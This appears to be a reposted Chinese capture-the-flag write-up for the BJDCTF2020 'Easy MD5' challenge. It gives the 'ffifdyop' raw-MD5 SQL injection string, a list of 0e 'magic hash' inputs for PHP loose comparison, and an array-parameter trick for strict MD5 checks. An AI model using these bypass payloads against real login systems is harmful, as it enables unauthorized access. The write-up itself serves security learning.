[BJDCTF2020]Easy MD5

image-20210919163843839

点击进行去后,看到有输入框。随便输入一串,并没有结果回显,查看数据包

image-20210919164500330

提示进行了md5加密

这里有一个神奇的字符串,

ffifdyop
由于数据库mysql会将md5加密后的hex值转换成字符串再执行,但这个字符串加密后再转字符串就是

'or'6�]��!r,��b
条件恒真

129581926211651571912466741651878684928
也有同效

登陆后,image-20210920091930843

查看源码

image-20210920093318708

这是一个弱类型的MD5碰撞,

QNKCDZO
0e830400451993494058024219903391


s878926199a
0e545993274517709034328855841020


s155964671a
0e342768416822451524974117254469


s214587387a
0e848240448830537924465865611904


s214587387a
0e848240448830537924465865611904


s878926199a
0e545993274517709034328855841020


s1091221200a
0e940624217856561557816327384675


s1885207154a
0e509367213418206700842008763514

s1502113478a
0e861580163291561247404381396064

常见的有上述这些,原理是当加密后,首字几个为0e,会被当成科学计数法,而0的几次方都是0。

image-20210920091720670

在跳转到这里,

这里则是md5的强对撞,使用数组类型可绕过

?param1[]=111&param2[]=222
内容来源于网络如有侵权请私信删除

文章来源: 博客园

原文链接: https://www.cnblogs.com/Hankysblogs/p/15314916.html

你还没有登录,请先登录注册
  • 还没有人评论,欢迎说说您的想法!